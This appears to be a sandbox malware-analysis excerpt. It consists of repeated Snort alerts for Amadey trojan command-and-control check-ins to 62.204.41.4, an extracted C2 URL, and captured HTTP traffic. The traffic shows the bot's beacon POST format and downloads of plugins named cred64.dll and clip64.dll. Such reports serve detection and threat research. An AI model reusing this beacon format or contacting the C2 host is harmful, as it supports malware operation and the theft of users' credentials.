                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49957 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49958 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49959 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49960 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49961 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49962 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49963 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49964 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49965 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49966 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49967 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49968 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49969 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49970 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49971 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49972 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49973 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49974 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49975 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49976 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49977 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49978 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49979 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49980 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49981 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49982 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49983 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49984 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49985 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49986 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49987 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49988 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49989 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49990 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49991 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49992 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49993 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49994 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49995 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49996 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49997 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49998 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49999 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50000 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50001 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50002 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50003 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50004 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50005 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50006 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50007 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50008 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50009 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50010 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50011 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50012 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50013 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50014 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50015 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50016 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50017 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50018 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50019 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50020 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50021 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50022 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50023 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50024 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50025 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50026 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50027 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50028 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50029 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50030 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50031 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50032 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50033 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50034 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50035 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50036 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50037 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50038 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50039 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50040 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50041 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50042 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50043 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50044 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50045 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50046 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50047 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50048 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50049 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50050 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50051 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50052 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50053 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50054 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50055 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50056 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50057 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50058 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50059 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50060 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50061 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50062 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50063 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50064 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50065 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50066 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50067 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50068 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50069 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50070 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50071 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50072 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50073 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50074 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50075 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50076 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50077 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50078 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50079 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50080 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50081 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50082 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50083 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50084 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50085 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50086 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50087 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50088 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50089 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50090 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50091 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50092 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50093 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50094 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50095 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50096 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50097 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50098 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50099 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50100 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50101 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50102 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50103 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50104 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50105 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50106 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50107 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50108 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50109 -> 62.204.41.4:80
                              Source: Malware configuration extractor URLs: 62.204.41.4/Gol478Ns/index.php
                              Source: global traffic HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 91 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.4
                              Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
